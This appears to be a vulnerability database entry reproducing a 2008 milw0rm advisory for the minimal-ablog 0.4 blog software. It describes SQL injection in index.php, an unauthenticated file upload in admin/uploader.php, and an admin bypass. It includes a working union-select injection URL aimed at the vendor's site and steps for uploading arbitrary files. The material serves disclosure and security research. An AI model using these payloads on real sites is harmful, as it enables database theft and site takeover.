minimal-ablog 0.4 SQL Injection, File Upload and Admin Bypass Vuln

vendor:

minimal-ablog

by:

NoGe

7.5

CVSS

HIGH

SQL Injection, File Upload and Admin Bypass

89,434,285

CWE

Product Name: minimal-ablog

Affected Version From: 0.4

Affected Version To: 0.4

Patch Exists: No

Related CWE: N/A

CPE: a:abweb:minimal-ablog

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

minimal-ablog 0.4 SQL Injection, File Upload and Admin Bypass Vuln

When a user visits the index.php page with a malicious SQL query, it is possible to inject malicious code into the database. Additionally, the uploader.php page can be used to upload malicious files, and the admin page can be bypassed to gain admin privileges.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query. Ensure that only authorized users are able to access the admin page.

Source

Exploit-DB raw data:

===========================================================================================================


  [o] minimal-ablog 0.4 SQL Injection, File Upload and Admin Bypass Vuln 

       Software : minimal-ablog version 0.4
       Vendor   : http://www.abweb.co.cc/
       Download : http://code.google.com/p/minimal-ablog/downloads/list
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


===========================================================================================================


  [o] Vulnerable file

       index.php
       admin/uploader.php



  [o] Exploit

       [ SQL Injection ]

	    http://localhost/[path]/index.php?id=[SQL]
	    http://www.abweb.co.cc/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8--  <=- demo

       [ File Upload ]

	    http://localhost/[path]/admin/uploader.php  <=- upload your file here
	    http://localhost/[path]/img/[your_file]  <=- file will be uploaded here

       [ Admin Bypass ]

	    when you open admin/uploader.php to upload file you already have admin privs too :)


===========================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11 martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]

        
===========================================================================================================

# milw0rm.com [2008-11-30]